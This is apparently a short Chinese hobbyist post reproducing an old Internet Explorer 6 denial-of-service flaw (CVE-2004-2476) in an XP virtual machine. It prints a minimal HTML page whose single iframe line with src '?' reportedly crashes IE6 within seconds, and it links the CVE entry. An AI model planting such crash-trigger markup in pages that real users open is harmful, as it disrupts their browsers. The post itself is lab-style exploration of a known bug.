最近对黑客感兴趣,上了一下国外的一个网站,看到一个IE6的漏洞,感觉自己能理解,就试了一下。

环境是XP的虚拟机,然后写了个html。

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>无标题文档</title>
</head>

<body>
<iframe src="?"></iframe>
</body>
</html>

漏洞代码是

<iframe src="?"></iframe>

效果图

IE6的一个很老的漏洞_拒绝服务攻击

 

几秒钟之内,IE6崩溃了。报告上说,黑客可以利用该漏洞来发动拒绝服务攻击。

 

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2476